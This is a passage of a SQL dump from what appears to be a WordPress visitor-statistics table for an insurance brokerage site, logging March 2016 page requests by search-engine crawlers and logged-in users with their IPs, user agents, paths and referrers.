1080','','','','Chaya','','0','51',0),(7337,'0b_bba3e20aa04f4f7b0086bdbb1b5a0619','1458575642','185.31.158.191','185.31.158.191','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinVista','Firefox 16','ua','','','','','','','0','0',0),(7338,'0b_53f7b55dc874d853bb21db125f6afd4f','1458575845','178.255.215.70','crawl06.exabot.com','/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7341,'0b_53f7b55dc874d853bb21db125f6afd4f','1458575850','178.255.215.70','crawl06.exabot.com','/comments/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7344,'0b_53f7b55dc874d853bb21db125f6afd4f','1458575851','178.255.215.70','crawl06.exabot.com','/home/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7347,'0b_8ad46087a9c55ec8090681a1334d30b1','1458576669','68.180.229.91','b115355.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(7350,'0b_8ad46087a9c55ec8090681a1334d30b1','1458576670','68.180.229.91','b115355.yse.yahoo.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(7353,'0b_fa561af906222410499a0798017f20c6','1458576683','66.249.73.169','crawl-66-249-73-169.googlebot.com','/products.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7356,'0b_8ad46087a9c55ec8090681a1334d30b1','1458576998','68.180.229.91','b115355.yse.yahoo.net','/insentives/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(7358,'0b_e0d02c40ba32daa789cf722cc8d22aaa','1458577402','66.249.83.209,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(7361,'0b_4fbff52861eb5fd496bb7003651677ca','1458577737','174.129.228.67','ec2-174-129-228-67.compute-1.amazonaws.com','/robots.txt','ia_archiver','','',0,'','','','','','Alexa','','','','0','0',0),(7362,'0b_4fbff52861eb5fd496bb7003651677ca','1458577737','174.129.228.67','ec2-174-129-228-67.compute-1.amazonaws.com','/agent-tools','ia_archiver','','',0,'','','','','','Alexa','','','','0','0',0),(7364,'0b_4fbff52861eb5fd496bb7003651677ca','1458577738','174.129.228.67','ec2-174-129-228-67.compute-1.amazonaws.com','/agent-tools/','ia_archiver','','',0,'','','','','','Alexa','','','','0','0',0),(7367,'0b_d4265c1621ed1a50f9185b07b8935811','1458577801','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(7368,'0b_d4265c1621ed1a50f9185b07b8935811','1458577803','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(7371,'0b_e1230f03331d31ccf070e0f61af1b33c','1458577857','91.238.134.93','hosted-by.slaskdatacenter.pl','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://empireins.com/','',0,'Win8','Chrome 39','pl','','','','','','','0','0',0),(7374,'0b_6c773da20a870f1f708f718d01f20b5e','1458578648','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','0',0),(7376,'0b_6c773da20a870f1f708f718d01f20b5e','1458578651','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','0',0),(7377,'0b_6c773da20a870f1f708f718d01f20b5e','1458578656','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(7379,'0b_6c773da20a870f1f708f718d01f20b5e','1458578666','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(7382,'0b_ff1cfcf2e26b36d767f6017d87e6110d','1458578885','66.249.73.187','crawl-66-249-73-187.googlebot.com','/register/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7385,'0b_ea75bc2846727be2ecacff755f0f2836','1458579955','66.249.73.178','crawl-66-249-73-178.googlebot.com','/agent-tools/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7388,'0b_dc75a0295fc2f3b4ad53c1df1733491f','1458580092','47.16.162.38','ool-2f10a226.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(7389,'0b_dc75a0295fc2f3b4ad53c1df1733491f','1458580093','47.16.162.38','ool-2f10a226.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(7392,'0b_dc75a0295fc2f3b4ad53c1df1733491f','1458580095','47.16.162.38','ool-2f10a226.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(7395,'0b_dc75a0295fc2f3b4ad53c1df1733491f','1458580108','47.16.162.38','ool-2f10a226.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(7397,'0b_6d784eb143d325c054bebf9a6ae53847','1458580310','69.30.221.250','latestdirect.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(7400,'0b_6d784eb143d325c054bebf9a6ae53847','1458580313','69.30.221.250','latestdirect.com','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(7403,'0b_6d784eb143d325c054bebf9a6ae53847','1458580314','69.30.221.250','latestdirect.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(7404,'0b_6d784eb143d325c054bebf9a6ae53847','1458580316','69.30.221.250','latestdirect.com','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(7406,'0b_6d784eb143d325c054bebf9a6ae53847','1458580318','69.30.221.250','latestdirect.com','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(7407,'0b_6d784eb143d325c054bebf9a6ae53847','1458580322','69.30.221.250','latestdirect.com','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(7409,'0b_6d784eb143d325c054bebf9a6ae53847','1458580323','69.30.221.250','latestdirect.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(7410,'0b_4f03663d1faa89f7430f756459850ce9','1458580490','66.249.73.178','crawl-66-249-73-178.googlebot.com','[404] /images/logo.jpg','Googlebot-Image/1.0','','',0,'','','','','','Googlebot','','','','0','0',0),(7413,'0b_3f2ba79ad06ac43fba715f9e542a0ea3','1458580536','107.77.68.25','107.77.68.25','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-N910A Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 49 Mobile','us','','','','','','','0','0',0),(7415,'0b_c6f88ba5f5b711e621859e9f799c2baf','1458581677','180.153.236.117','180.153.236.117','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider(compatible; HaosouSpider; http://www.haosou.com/help/help_3_2.html)','http://empireins.com/','',0,'Win7','','cn','','','','','','','0','0',0),(7416,'0b_1efbd298860447f6f693f61f7f89ae76','1458582160','107.77.68.25','107.77.68.25','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG-SM-N910A Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 49 Mobile','us','360 x 640','','','','','','0','0',0),(7419,'0b_0c783329750fce6ac2bab83d6518060f','1458583614','66.249.73.189','crawl-66-249-73-189.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7421,'0b_0c783329750fce6ac2bab83d6518060f','1458583621','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(7422,'0b_5b7dc310af1bd05d6ab94e0b1748bc08','1458583696','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','','',0,'Win7','Chrome 35','us','','','','','','','0','0',0),(7424,'0b_5b7dc310af1bd05d6ab94e0b1748bc08','1458583698','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 35','us','','','','','','','0','0',0),(7427,'0b_ff9c22cd877f7c67bc1958d1e69ea7e4','1458584804','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7428,'0b_ff9c22cd877f7c67bc1958d1e69ea7e4','1458584907','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(7431,'0b_ff9c22cd877f7c67bc1958d1e69ea7e4','1458584936','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7434,'0b_ff9c22cd877f7c67bc1958d1e69ea7e4','1458584947','207.46.13.188','msnbot-207-46-13-188.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(7437,'0b_0deff335d704c645a49d03ae823b4b82','1458584995','157.55.2.167','msnbot-157-55-2-167.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(7440,'0b_9f96f5d12c2a807b2a13583475775b8f','1458585134','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(7443,'0b_9f96f5d12c2a807b2a13583475775b8f','1458585136','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(7445,'0b_9f96f5d12c2a807b2a13583475775b8f','1458585141','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(7446,'0b_0d04f9435ebcd69cd9e068aa65f8654e','1458585717','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(7449,'0b_0d04f9435ebcd69cd9e068aa65f8654e','1458585730','209.64.152.62','209.64.152.62','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(7451,'0b_0d04f9435ebcd69cd9e068aa65f8654e','1458585754','209.64.152.62','209.64.152.62','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(7452,'0b_0d04f9435ebcd69cd9e068aa65f8654e','1458585834','209.64.152.62','209.64.152.62','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/contact/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(7455,'0b_0d04f9435ebcd69cd9e068aa65f8654e','1458585841','209.64.152.62','209.64.152.62','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(7458,'0b_0d04f9435ebcd69cd9e068aa65f8654e','1458585844','209.64.152.62','209.64.152.62','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(7461,'0b_0d04f9435ebcd69cd9e068aa65f8654e','1458585847','209.64.152.62','209.64.152.62','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/licensing-contracting/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(7464,'0b_0d04f9435ebcd69cd9e068aa65f8654e','1458585849','209.64.152.62','209.64.152.62','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/insentives/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(7467,'0b_0d04f9435ebcd69cd9e068aa65f8654e','1458585865','209.64.152.62','209.64.152.62','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(7470,'0b_4521352dc178010ac692ce9df10dd916','1458587005','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7472,'0b_4521352dc178010ac692ce9df10dd916','1458587006','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7475,'0b_41db6e224c0223d2bfda1207b7b0fe89','1458587374','136.243.152.18','static.18.152.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(7476,'0b_41db6e224c0223d2bfda1207b7b0fe89','1458587379','136.243.152.18','static.18.152.243.136.clients.your-server.de','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(7478,'0b_41db6e224c0223d2bfda1207b7b0fe89','1458587381','136.243.152.18','static.18.152.243.136.clients.your-server.de','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(7479,'0b_4521352dc178010ac692ce9df10dd916','1458587595','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(7482,'0b_4521352dc178010ac692ce9df10dd916','1458587694','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(7484,'0b_4521352dc178010ac692ce9df10dd916','1458587707','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(7485,'0b_ca235b969d415fc31efdeab7744454e9','1458587768','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7488,'0b_ca235b969d415fc31efdeab7744454e9','1458587771','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7491,'0b_4521352dc178010ac692ce9df10dd916','1458588285','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7494,'0b_4521352dc178010ac692ce9df10dd916','1458588287','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7497,'0b_32fc85d5c07b91e65eed57bac76baa94','1458588735','151.80.44.115','mj5.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(7499,'0b_4521352dc178010ac692ce9df10dd916','1458588736','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(7502,'0b_32fc85d5c07b91e65eed57bac76baa94','1458588737','151.80.44.115','mj5.naefmarco.ch','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(7503,'0b_4521352dc178010ac692ce9df10dd916','1458588746','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(7506,'0b_8069c74a6508fde47a3e6bd86c12b18a','1458588891','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/top.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7508,'0b_c7d3002cce411b6a0867e811547702f1','1458588956','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7511,'0b_c7d3002cce411b6a0867e811547702f1','1458588957','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7514,'0b_f16f94c4086446d90b57477e42031a89','1458589640','69.30.198.186','69.30.198.186','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(7515,'0b_f16f94c4086446d90b57477e42031a89','1458589651','69.30.198.186','69.30.198.186','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(7518,'0b_31d966ef264766417047a6c81f7455bb','1458589976','24.220.192.126','host-126-192-220-24-static.midco.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','https://www.google.com','_notprovided_',1,'Win7 x64','Firefox 44','us','','www.google.com','','','','','0','0',0),(7520,'0b_31d966ef264766417047a6c81f7455bb','1458589980','24.220.192.126','host-126-192-220-24-static.midco.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 44','us','','','','','','','0','0',0),(7521,'0b_d4265c1621ed1a50f9185b07b8935811','1458590383','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(7523,'0b_d4265c1621ed1a50f9185b07b8935811','1458590384','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(7526,'0b_d4265c1621ed1a50f9185b07b8935811','1458590391','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(7527,'0b_b3552695b004acc015da2cb480e0f2ef','1458590606','178.255.215.70','crawl06.exabot.com','/forms/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7529,'0b_b3552695b004acc015da2cb480e0f2ef','1458591084','178.255.215.70','crawl06.exabot.com','/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7532,'0b_b3552695b004acc015da2cb480e0f2ef','1458591085','178.255.215.70','crawl06.exabot.com','/comments/feed/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7535,'0b_b3552695b004acc015da2cb480e0f2ef','1458591088','178.255.215.70','crawl06.exabot.com','/?p=311','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7538,'0b_b3552695b004acc015da2cb480e0f2ef','1458591092','178.255.215.70','crawl06.exabot.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(7541,'0b_e55ac33fa3fbbc7d47fd0bfd915fbad3','1458591192','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(7544,'0b_e55ac33fa3fbbc7d47fd0bfd915fbad3','1458591194','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(7545,'0b_e55ac33fa3fbbc7d47fd0bfd915fbad3','1458591196','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(7547,'0b_e55ac33fa3fbbc7d47fd0bfd915fbad3','1458591203','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(7548,'0b_e55ac33fa3fbbc7d47fd0bfd915fbad3','1458591583','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(7551,'0b_e55ac33fa3fbbc7d47fd0bfd915fbad3','1458591600','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(7553,'0b_7034dfbb1354da486cb044f9579ac479','1458592312','178.255.215.70','crawl06.exabot.com','/feed/','Mozilla/5.0 (compatible; Exabot/3.0; 